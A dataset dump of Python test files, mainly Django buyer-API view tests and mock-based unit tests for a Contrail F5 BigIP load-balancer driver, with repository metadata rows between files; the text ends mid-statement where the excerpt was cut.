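        # Mirrors the AddField operation in the migration above.
        followers = models.ManyToManyField(
            settings.AUTH_USER_MODEL,
            related_name='thread_following',
            through='ThreadFollowership',
        )


    class ThreadFollowership(models.Model):
        # Hypothetical through model; field names are illustrative.
        user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
        thread = models.ForeignKey(Thread, on_delete=models.CASCADE)
        created = models.DateTimeField(auto_now_add=True)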
650a8c743c76ea9bb108b7bc46a8f2beb0a59150
2,024
py
Python
buyer/tests/test_views.py
uktrade/directory-api
45a9024a7ecc2842895201cbb51420ba9e57a168
[ "MIT" ]
2
2017-06-02T09:09:08.000Z
2021-01-18T10:26:53.000Z
buyer/tests/test_views.py
uktrade/directory-api
45a9024a7ecc2842895201cbb51420ba9e57a168
[ "MIT" ]
629
2016-10-10T09:35:52.000Z
2022-03-25T15:04:04.000Z
buyer/tests/test_views.py
uktrade/directory-api
45a9024a7ecc2842895201cbb51420ba9e57a168
[ "MIT" ]
5
2017-06-22T10:02:22.000Z
2022-03-14T17:55:21.000Z
import http from unittest.mock import Mock, patch import pytest from django.conf import settings from django.test import override_settings from django.urls import reverse from rest_framework import status from buyer import models from core.tests.test_views import reload_module, reload_urlconf @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) @patch('core.views.get_file_from_s3') @override_settings(STORAGE_CLASS_NAME='default') @override_settings(AWS_STORAGE_BUCKET_NAME_DATA_SCIENCE='my_db_buket')
37.481481
100
0.736166
import http from unittest.mock import Mock, patch import pytest from django.conf import settings from django.test import override_settings from django.urls import reverse from rest_framework import status from buyer import models from core.tests.test_views import reload_module, reload_urlconf @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) def test_create_buyer_deserialization(client): data = { 'email': 'jim@example.com', 'name': 'Jim Exampleson', 'sector': 'AEROSPACE', 'company_name': 'Example corp', 'country': 'China', 'comment': 'Good stuff.', } response = client.post(reverse('buyer-create'), data) instance = models.Buyer.objects.last() assert response.status_code == http.client.CREATED assert instance.email == data['email'] assert instance.name == data['name'] assert instance.sector == data['sector'] @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) @patch('core.views.get_file_from_s3') @override_settings(STORAGE_CLASS_NAME='default') @override_settings(AWS_STORAGE_BUCKET_NAME_DATA_SCIENCE='my_db_buket') def test_buyer_csv_dump(mocked_get_file_from_s3, authed_client): reload_module('company.views') reload_module('buyer.views') reload_urlconf() mocked_body = Mock() mocked_body.read.return_value = b'company_name\r\nacme\r\n' mocked_get_file_from_s3.return_value = {'Body': mocked_body} response = authed_client.get(reverse('buyer-csv-dump'), {'token': settings.CSV_DUMP_AUTH_TOKEN}) assert response.status_code == status.HTTP_200_OK assert response.content == b'company_name\r\nacme\r\n' assert response._headers['content-type'] == ('Content-Type', 'text/csv') assert response._headers['content-disposition'] == ( 'Content-Disposition', 'attachment; filename="{filename}"'.format(filename=settings.BUYERS_CSV_FILE_NAME), )
1,296
0
44
1cb01409585916ebaaa745f459bc65177a6e04ff
44,690
py
Python
src/config/svc-monitor/svc_monitor/tests/test_f5_lb.py
UbuntuEvangelist/contrail-controller
4e8a992230f8f8e91e4f753e19b5442d9e1b446d
[ "Apache-2.0" ]
null
null
null
src/config/svc-monitor/svc_monitor/tests/test_f5_lb.py
UbuntuEvangelist/contrail-controller
4e8a992230f8f8e91e4f753e19b5442d9e1b446d
[ "Apache-2.0" ]
null
null
null
src/config/svc-monitor/svc_monitor/tests/test_f5_lb.py
UbuntuEvangelist/contrail-controller
4e8a992230f8f8e91e4f753e19b5442d9e1b446d
[ "Apache-2.0" ]
18
2017-01-12T09:28:44.000Z
2019-04-18T20:47:42.000Z
import mock from mock import patch import unittest from cfgm_common.vnc_db import DBBase from svc_monitor import config_db from svc_monitor import loadbalancer_agent from vnc_api.vnc_api import * import argparse import ConfigParser # end setUp # end tearDown # end create_pool #end create_hm_obj # end create_hm # end update_pool # end update_vip # end create_pool_members # end create_pool_member # end create_project # end create_vn # end obj_to_dict # end create_vmi # end create_iip # end create_vip # end test_add_delete_pool_with_members_vip # end test_add_delete_pool_with_members_vip_hm # end test_update_pool # Test the case where vip is deleted before the pool # end test_update_pool # end test_update_pool_members_add_delete # end test_update_pool_member_props # end test_update_pool_members_add_delete # end test_update_vip # end test_update_vip # end test_update_vip_persistance_type # end test_add_delete_pool_with_members_vip_hm # end test_add_delete_multiple_pools #end F5LBTest(unittest.TestCase):
47.643923
318
0.637055
import mock from mock import patch import unittest from cfgm_common.vnc_db import DBBase from svc_monitor import config_db from svc_monitor import loadbalancer_agent from vnc_api.vnc_api import * import argparse import ConfigParser class F5LBTest(unittest.TestCase): def setUp(self): self.vnc_lib = mock.Mock() self.cassandra = mock.Mock() self.logger = mock.Mock() self.svc = mock.Mock() mocked_gsc = mock.MagicMock() mocked_gsc.uuid = 'fake-gsc-uuid' self.vnc_lib.global_system_config_read.return_value = mocked_gsc def mock_kv_retrieve(subnet_id): if subnet_id == "pool_subnet_id": return "fake-pool-vn 40.1.1.0/24" elif subnet_id == "vip_subnet_id": return "fake-vip-vn 1.1.1.0/24" self.assertTrue(False) #end self.vnc_lib.kv_retrieve = mock.Mock(side_effect=mock_kv_retrieve) self.vnc_lib.service_appliance_set_create.return_value = "opencontrail" self._mock_bigip_interfaces = None self._mock_BigIp = None self._db = {} def read_db(id): if id in self._db: return self._db[id].get('driver_info', None) def put_db(id, data): from copy import deepcopy self._db[id] = {'driver_info': deepcopy(data)} def remove_db(id, data=None): if data is None: del self._db[id] return if self._db[id][data[0]]: del self._db[id][data[0]] self.cassandra.pool_driver_info_get = mock.Mock(side_effect=read_db) self.cassandra.pool_driver_info_insert = mock.Mock(side_effect=put_db) self.cassandra.pool_remove = mock.Mock(side_effect=remove_db) conf_parser = argparse.ArgumentParser(add_help=False) config = ConfigParser.SafeConfigParser({'admin_token': None}) self._args, remaining_argv = conf_parser.parse_known_args() self._args.config_sections = config def sas_read_side_effect(obj_type, uuids): if obj_type == 'service_appliance_set': return (True, [{ 'fq_name': ['default-global-system-config', 'opencontrail'], 'service_appliance_driver': 'svc_monitor.services.loadbalancer\ .drivers.ha_proxy.driver.OpencontrailLoadbalancerDriver' }]) return (False, None) DBBase.init(self.svc, None, self.cassandra) config_db.ServiceApplianceSetSM._cassandra.object_read = \ mock.Mock(side_effect=sas_read_side_effect) # return NoIdError exception for first query def no_id_side_effect(fq_name): raise NoIdError("xxx") self.vnc_lib.service_appliance_set_read = \ mock.Mock(side_effect=no_id_side_effect) self.lb_agent = loadbalancer_agent.LoadbalancerAgent(self.svc, self.vnc_lib, self.cassandra, self._args) self.svc.loadbalancer_agent = self.lb_agent sas = config_db.ServiceApplianceSetSM.get('opencontrail') self.assertEqual(sas.driver, "svc_monitor.services.loadbalancer.drivers.ha_proxy.driver.\ OpencontrailLoadbalancerDriver") sas.add() DBBase.init(self.svc, None, self.cassandra) config_db.ServiceApplianceSetSM._cassandra.object_read = \ mock.Mock(side_effect=sas_read_side_effect) import sys sys.modules['f5'] = mock.Mock() sys.modules['f5.bigip'] = mock.Mock() self.create_f5_service_appliance_set() # end setUp def create_f5_service_appliance_set(self): sas_obj = {} sas_obj['fq_name'] = ["default-global-system-config", "f5"] sas_obj['uuid'] = 'f5-sas' sas_obj['display_name'] = "f5" sas = config_db.ServiceApplianceSetSM.locate(sas_obj['uuid'], sas_obj) sas.kvpairs = [{'key': 'sync_mode', 'value': 'replication'}, {'key': 'num_snat', 'value': '1'}, {'key': 'global_routed_mode', 'value': 'True'}, {'key': 'vip_vlan', 'value': 'access'}, {'key': 'use_snat', 'value': 'True'}] sas.ha_mode = "standalone" sas.driver = "svc_monitor.services.loadbalancer.drivers.f5.f5_driver.OpencontrailF5LoadbalancerDriver" sa_obj = {} sa_obj['fq_name'] = 
["default-global-system-config", "f5", "bigip"] sa_obj['uuid'] = 'bigip' sa_obj['display_name'] = 'bigip' sa_obj['parent_uuid'] = 'f5-sas' sa_obj['service_appliance_ip_address'] = "1.1.1.1" sa_obj['service_appliance_user_credentials'] = {'username': "admin", 'password': "contrail123"} sa = config_db.ServiceApplianceSM.locate(sa_obj['uuid'], sa_obj) def test_decorate_name(name1, name2): return name1+'_'+name2 bigip_patcher = \ mock.patch('svc_monitor.services.loadbalancer.drivers.f5.f5_driver.f5_bigip.BigIP') self._mock_BigIp = bigip_patcher.start() self._mock_BigIp.return_value.cluster.get_traffic_groups.return_value = [] bigip_interface_patcher = \ mock.patch('svc_monitor.services.loadbalancer.drivers.f5.f5_driver.bigip_interfaces') self._mock_bigip_interfaces = bigip_interface_patcher.start() self._mock_bigip_interfaces.decorate_name = \ mock.Mock(side_effect=test_decorate_name) sas.add() def tearDown(self): self._mock_BigIp.reset_mock() config_db.ServiceApplianceSetSM.delete("opencontrail") config_db.ServiceApplianceSetSM.delete("f5-sas") config_db.ServiceApplianceSM.delete("bigip") config_db.LoadbalancerPoolSM.reset() config_db.VirtualIpSM.reset() config_db.InstanceIpSM.reset() config_db.VirtualMachineInterfaceSM.reset() config_db.VirtualNetworkSM.reset() config_db.ProjectSM.reset() # end tearDown def create_pool(self, uuid, fq_name_str, project=None, vip=None, hm=None): pool_network = self.create_vn("fake-pool-vn", "fake-pool-vn", project) pool_obj = {} pool_obj['fq_name'] = fq_name_str.split(':') pool_obj['uuid'] = uuid pool_obj['display_name'] = fq_name_str pool_obj['parent_uuid'] = 'tenant' pool_obj['id_perms'] = {'enable': 'true', 'description': 'Test pool'} pool_obj['loadbalancer_pool_provider'] = 'f5' pool_obj['loadbalancer_pool_properties'] = \ {'protocol': 'HTTP', 'subnet_id': 'pool_subnet_id', 'loadbalancer_method': 'ROUND_ROBIN', 'admin_state': True, 'session_persistence': None, 'persistence_cookie_name': None} if vip: pool_obj['virtual_ip_back_refs']=[{'uuid': vip.uuid}] if hm: pool_obj['loadbalancer_healthmonitor_refs']=[{'uuid': hm.uuid}] pool = config_db.LoadbalancerPoolSM.locate(pool_obj['uuid'], pool_obj) return pool # end create_pool def create_hm_obj(self, fq_name_str): hm_obj = {} hm_obj['fq_name'] = fq_name_str.split(':') hm_obj['uuid'] = fq_name_str hm_obj['display_name'] = fq_name_str hm_obj['parent_uuid'] = 'tenant' hm_obj['id_perms'] = {'enable': 'true', 'description': 'Test pool'} hm_obj['loadbalancer_healthmonitor_properties'] = {'delay': '5', 'expected_codes': '200', 'max_retries': '200', 'http_method': 'GET', 'timeout': '2', 'url_path': '/', 'monitor_type': 'HTTP', 'admin_state': True} return hm_obj #end create_hm_obj def create_hm(self, fq_name_str): hm_obj = self.create_hm_obj(fq_name_str) hm = config_db.HealthMonitorSM.locate(hm_obj['uuid'], hm_obj) return hm # end create_hm def update_pool(self, pool_obj, vip=None): pool_obj.params['loadbalancer_method'] = 'LEAST_CONNECTIONS' pool_obj.params['protocol'] = 'HTTPS' pool_obj.params['admin_state'] = False # end update_pool def update_vip(self, vip_obj, pool=None): vip_obj.params['connection_limit'] = '100' vip_obj.params['persistence_type'] = 'always' vip_obj.params['admin_state'] = False # end update_vip def create_pool_members(self, pool_name, num_members): for i in range(num_members): self.create_pool_member(pool_name, 'member_'+str(i), '10.1.1.'+str(i)) # end create_pool_members def create_pool_member(self, pool_name, member_name, member_address): pool_member_obj = {} pool_member_obj['fq_name'] = 
member_name pool_member_obj['uuid'] = member_name pool_member_obj['display_name'] = member_name pool_member_obj['parent_uuid'] = pool_name pool_member_obj['id_perms'] = \ {'enable': 'true', 'description': 'Test pool member'} pool_member_obj['loadbalancer_member_properties'] = \ {'protocol_port': '80', 'address': member_address, 'weight': '1', 'status': 'up', 'admin_state': True} member = config_db.LoadbalancerMemberSM.locate(pool_member_obj['uuid'], pool_member_obj) # end create_pool_member def create_project(self, name, uuid): project = Project(name=name, fq_name=["default-domain", name]) project.uuid = uuid proj_dict = self.obj_to_dict(project) config_db.ProjectSM.locate(uuid, proj_dict) return project # end create_project def create_vn(self, name, uuid, parent_obj): network = VirtualNetwork(name=name, parent_obj=parent_obj) network.uuid = uuid net_dict = self.obj_to_dict(network) config_db.VirtualNetworkSM.locate(uuid, net_dict) return network # end create_vn def obj_to_dict(self, obj): def to_json(obj): if hasattr(obj, 'serialize_to_json'): return obj.serialize_to_json(obj.get_pending_updates()) else: return dict((k, v) for k, v in obj.__dict__.iteritems()) return json.loads(json.dumps(obj, default=to_json)) # end obj_to_dict def create_vmi(self, name, uuid, parent_obj, net_obj): vmi = VirtualMachineInterface(name=name, parent_obj=parent_obj) vmi.set_virtual_network(net_obj) vmi.uuid = uuid vmi_dict = self.obj_to_dict(vmi) config_db.VirtualMachineInterfaceSM.locate(uuid, vmi_dict) return vmi # end create_vmi def create_iip(self, name, uuid, ip, net_obj, vmi_obj): iip = InstanceIp(name=name, instance_ip_address=ip, instance_ip_family="v4") iip.set_virtual_network(net_obj) iip.set_virtual_machine_interface(vmi_obj) iip.uuid = uuid iip_dict = self.obj_to_dict(iip) config_db.InstanceIpSM.locate(uuid, iip_dict) return iip # end create_iip def create_vip(self, vip, project): vip_obj = {} vip_obj['fq_name'] = vip.split(':') vip_obj['uuid'] = vip vip_obj['display_name'] = vip vip_obj['id_perms'] = {'enable': 'true', 'description': 'Test pool'} vip_obj['virtual_ip_properties'] = {'status': 'UP', 'protocol_port': '80', 'subnet_id': 'vip_subnet_id', 'protocol': 'HTTP', 'admin_state': True, 'connection_limit': '-1', 'persistence_type': None, 'persistence_cookie_name': None, 'address': '1.1.1.1'} network = self.create_vn("fake-vip-vn", "fake-vip-vn", project) vmi = self.create_vmi("vmi", "vmi", project, network) iip = self.create_iip("iip", "iip", "1.1.1.1", network, vmi) vip_vnc = VirtualIp.from_dict(**vip_obj) vip_vnc.set_virtual_machine_interface(vmi) vip_obj = self.obj_to_dict(vip_vnc) vip_obj['parent_uuid'] = 'tenant' vip = config_db.VirtualIpSM.locate(vip, vip_obj) return vip # end create_vip def test_add_delete_pool_with_members_vip(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 5) pool.add() self.assertEqual(len(self._db), 1) self.assertTrue('test-lb-pool' in self._db) # Ensure we call the BigIp with correct ip, user name and password self._mock_BigIp.assert_called_with('1.1.1.1', 'admin', 'contrail123', 5, True, True) self._mock_BigIp.return_value.pool.create.assert_called_with( description='test-lb-pool:Test pool', folder='tenant', lb_method='ROUND_ROBIN', name='test-lb-pool') expected_calls_to_add_member = \ [mock.call(folder='tenant', ip_address='10.1.1.4%0', name='test-lb-pool', no_checks=True, 
port=80), mock.call(folder='tenant', ip_address='10.1.1.3%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=80)] call_list = self._mock_BigIp.return_value.pool.add_member.call_args_list self.assertEqual(call_list, expected_calls_to_add_member) expected_calls_to_enable_member = expected_calls_to_add_member call_list = \ self._mock_BigIp.return_value.pool.enable_member.call_args_list self.assertEqual(call_list, expected_calls_to_enable_member) expected_calls_to_set_member_ratio = \ [mock.call(folder='tenant', ip_address='10.1.1.4%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.3%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=80, ratio=1)] call_list = \ self._mock_BigIp.return_value.pool.set_member_ratio.call_args_list self.assertEqual(call_list, expected_calls_to_set_member_ratio) self._mock_BigIp.return_value.virtual_server.create.assert_called_with( folder='tenant', ip_address='1.1.1.1%0', mask='255.255.255.255', name='vip', port=80, preserve_vlan_name=True, protocol='HTTP', snat_pool=None, traffic_group='/Common/traffic-group-1', use_snat=True, vlan_name='access') self._mock_BigIp.return_value.virtual_server.set_description.assert_called_with( description='vip:Test pool', folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.set_pool.assert_called_with( folder='tenant', name='vip', pool_name='test-lb-pool') self._mock_BigIp.return_value.virtual_server.enable_virtual_server.assert_called_with( folder='tenant', name='vip') # Cleanup for i in range(5): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') self._mock_BigIp.return_value.virtual_server.delete.assert_called_with( folder='tenant', name='vip') expected_calls_to_remove_member = \ [mock.call(folder='tenant', ip_address='10.1.1.4%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.3%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=80)] call_list = self._mock_BigIp.return_value.pool.remove_member.call_args_list self.assertEqual(call_list, expected_calls_to_remove_member) self._mock_BigIp.return_value.pool.delete.assert_called_with( folder='tenant', name='test-lb-pool') self.assertEqual(len(self._db), 0) # end test_add_delete_pool_with_members_vip def test_add_delete_pool_with_members_vip_hm(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) hm_obj = self.create_hm_obj("test-hm") hm_obj['loadbalancer_pool_back_refs']=[{'uuid': pool.uuid}] hm = 
config_db.HealthMonitorSM.locate(hm_obj['uuid'], hm_obj) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.return_value.monitor.create.assert_called_with( folder='tenant', interval='5', mon_type='HTTP', name='test-hm', recv_text=None, send_text=None, timeout=400) self._mock_BigIp.return_value.pool.add_monitor.assert_called_with( folder='tenant', monitor_name='test-hm', name='test-lb-pool') self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 200') self.assertEqual(len(self._db), 1) self.assertTrue('test-lb-pool' in self._db) # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') config_db.HealthMonitorSM.delete('test-hm') self._mock_BigIp.return_value.monitor.delete.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm') self.assertEqual(len(self._db), 0) # end test_add_delete_pool_with_members_vip_hm def test_update_pool(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.reset_mock() pool.id_perms['description'] = 'updated' pool.add() self._mock_BigIp.return_value.pool.set_description.assert_called_with( description='test-lb-pool:updated', folder='tenant', name='test-lb-pool') self._mock_BigIp.reset_mock() pool.params['loadbalancer_method'] = 'LEAST_CONNECTIONS' pool.add() self._mock_BigIp.return_value.pool.set_lb_method.assert_called_with( folder='tenant', lb_method='LEAST_CONNECTIONS', name='test-lb-pool') # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool # Test the case where vip is deleted before the pool def test_update_pool_1(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() # Delete the VIP config_db.VirtualIpSM.delete('vip') # update the pool with no vip pool.add() self._mock_BigIp.return_value.virtual_server.delete.assert_called_with( folder='tenant', name='vip') expected_calls_to_remove_member = \ [mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=80)] call_list = self._mock_BigIp.return_value.pool.remove_member.call_args_list self.assertEqual(call_list, expected_calls_to_remove_member) self._mock_BigIp.return_value.pool.delete.assert_called_with( folder='tenant', name='test-lb-pool') self.assertEqual(len(self._db), 1) # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) self._mock_BigIp.reset_mock() self.assertFalse(self._mock_BigIp.return_value.pool.delete.called) self.assertFalse(self._mock_BigIp.return_value.pool.remove_member.called) self.assertFalse(self._mock_BigIp.return_value.virtual_server.delete.called) config_db.LoadbalancerPoolSM.delete('test-lb-pool') # end 
test_update_pool def test_update_pool_members_add_delete(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.reset_mock() self.create_pool_members("test-lb-pool", 3) pool.add() # Ensure that only the new member is added self._mock_BigIp.return_value.pool.add_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80, ratio=1) # Delete last two members self._mock_BigIp.reset_mock() for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i+1)) pool.add() expected_calls_to_remove_member =\ [mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', port=80)] call_list = self._mock_BigIp.return_value.pool.remove_member.call_args_list self.assertEqual(call_list, expected_calls_to_remove_member) # Cleanup config_db.LoadbalancerMemberSM.delete('member_0') config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool_members_add_delete def test_update_pool_member_props(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() # Validate member ratio update self._mock_BigIp.reset_mock() member = config_db.LoadbalancerMemberSM.get('member_0') member.params['weight'] = 20 pool.add() self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=80, ratio=20) self._mock_BigIp.reset_mock() # Validate member admin_state update member = config_db.LoadbalancerMemberSM.get('member_1') member.params['admin_state'] = False pool.add() self._mock_BigIp.return_value.pool.disable_member.assert_called_with( folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.reset_mock() member = config_db.LoadbalancerMemberSM.get('member_1') member.params['admin_state'] = True pool.add() self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80) # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool_member_props def test_update_pool_members_add_delete_update(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) for i in range(2): self.create_pool_member("test-lb-pool", 'member_'+str(i), '10.1.1.'+str(i)) pool.add() self._mock_BigIp.reset_mock() # Existing member 1,2 # New member 3 # delete the member 1 # Final meber 2,3 self.create_pool_member("test-lb-pool", 'member_2', '10.1.1.2') 
config_db.LoadbalancerMemberSM.delete('member_0') member = config_db.LoadbalancerMemberSM.get('member_1') member.params['admin_state'] = False pool.add() # validate # member_1 updated with admin state disable self._mock_BigIp.return_value.pool.disable_member.assert_called_with( folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80) # member_0 removed self._mock_BigIp.return_value.pool.remove_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=80) # member_2 added self._mock_BigIp.return_value.pool.add_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80, ratio=1) # Cleanup config_db.LoadbalancerMemberSM.delete('member_1') config_db.LoadbalancerMemberSM.delete('member_2') config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool_members_add_delete def test_pool_for_tcp(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) vip.params['protocol'] = 'FTP' vip.params['protocol_port'] = '22' vip.params['connection_limit'] = '12' pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) pool.params['protocol'] = 'FTP' pool.params['loadbalancer_method'] = 'SOURCE_IP' self.create_pool_members("test-lb-pool", 1) member_0 = config_db.LoadbalancerMemberSM.get('member_0') member_0.params['protocol_port'] = '23' pool.add() # Validate calls with correct port self._mock_BigIp.return_value.pool.create.assert_called_with( description='test-lb-pool:Test pool', folder='tenant', lb_method='SOURCE_IP', name='test-lb-pool') self._mock_BigIp.return_value.pool.add_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=23) self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=23) self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=23, ratio=1) self._mock_BigIp.return_value.virtual_server.create.assert_called_with( folder='tenant', ip_address='1.1.1.1%0', mask='255.255.255.255', name='vip', port=22, preserve_vlan_name=True, protocol='FTP', snat_pool=None, traffic_group='/Common/traffic-group-1', use_snat=True, vlan_name='access') self._mock_BigIp.return_value.virtual_server.set_description.assert_called_with( description='vip:Test pool', folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.set_pool.assert_called_with( folder='tenant', name='vip', pool_name='test-lb-pool') self._mock_BigIp.return_value.virtual_server.enable_virtual_server.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.remove_all_persist_profiles.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.set_connection_limit.assert_called_with( connection_limit=12, folder='tenant', name='vip') self._mock_BigIp.reset_mock() # Cleanup config_db.LoadbalancerMemberSM.delete('member_0') 
config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') self._mock_BigIp.return_value.virtual_server.delete.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.return_value.pool.remove_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=23) self._mock_BigIp.return_value.pool.delete.assert_called_with( folder='tenant', name='test-lb-pool') self._mock_BigIp.return_value.arp.delete_all.assert_called_with( folder='tenant') self._mock_BigIp.return_value.decorate_folder.assert_called_with('tenant') self.assertTrue(self._mock_BigIp.return_value.system.delete_folder.called) # end test_update_vip def test_update_vip(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() # Validate vip update self._mock_BigIp.reset_mock() vip.id_perms['description'] = "New Description" pool.add() self._mock_BigIp.return_value.virtual_server.set_description.assert_called_with( description='vip:New Description', folder='tenant', name='vip') self._mock_BigIp.reset_mock() vip.params['admin_state'] = False pool.add() self._mock_BigIp.return_value.virtual_server.disable_virtual_server.assert_called_with( folder='tenant', name='vip') vip.params['admin_state'] = True pool.add() self._mock_BigIp.return_value.virtual_server.enable_virtual_server.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.reset_mock() vip.params['connection_limit'] = '100' pool.add() # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_vip def test_update_vip_persistance_type(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) vip.params['persistence_type'] = 'SOURCE_IP' pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 1) pool.add() # Test with persistence_type = HTTP_COOKIE self._mock_BigIp.reset_mock() vip.params['persistence_type'] = 'HTTP_COOKIE' pool.add() self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/cookie') # Test with persistence_type = APP_COOKIE self._mock_BigIp.reset_mock() vip.params['persistence_type'] = 